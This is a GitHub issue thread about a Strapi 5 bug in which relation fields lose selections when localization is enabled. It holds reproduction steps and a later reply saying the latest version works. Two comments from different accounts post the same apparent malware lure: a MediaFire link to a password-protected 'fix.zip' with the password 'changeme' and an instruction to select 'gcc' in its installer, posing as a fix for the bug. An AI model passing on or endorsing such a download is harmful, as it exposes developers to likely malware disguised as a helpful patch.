### ISSUE TITLE
[Strapi 5] Relation picker doesn't work properly

### ISSUE THREAD

**Issue by amirplaza** [strapi/strapi#21070]
### Required System information

- Node.js version: v20.15.0
- NPM version: 10.7.0
- Strapi version: 5.0.0-rc.11
- Database: sqlite
- Operating system: OSX Sonoma 14.6.1, Chrome Version 128.0.6613.84 (Official Build) (arm64)
- Is your project Javascript or Typescript: Typescript

### Describe the bug

Multi relation is not usable with localization ON.

### Steps to reproduce the behavior
I don't know all the possible ways to invoke this bug, but I know for sure of 1.
Use two localizations in admin panel. In my case: **nl** and **en**.
Default localization NL

1. create a collection type  without localization, one field of type string
2. create a single type with localization, one multi-relation field pointing to the collection type created in the previous step.
3. Save and wait for strapi to restart
4. go to content and add entries in the collection type: "A", "B", "C"
5. Edit the single type while using the default localization (top-right corner, in my case NL).
6. select "A", hit save
7. Switch to EN
8. Select "B", hit save
9. Switching back to NL: I can't see "A" selected anymore, I still see "B". 
MAIN PROBLEM: it is no longer possible to select "A" anymore.

### Expected behavior

I expect to be able to use relations. I don't mind if they are not localized, but currently it is not usable at all if I want to use localization in another type that is using that.

### Screenshots
- I can supply them upon request.
### Code snippets
- none necessary
### Additional context

- This doesn't work well also for single-relation.
- Default language set in admin panel EN or NL doesn't matter. 
- Apart from single that I described, the relation doesn't work also in collection types.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by amirplaza** [comment]
Has somebody looked into this already? 👀

**Comment by Boegie19** [comment]
On the latest version if I follow your staps both dutch has A and english has B no matter how many times I change it.
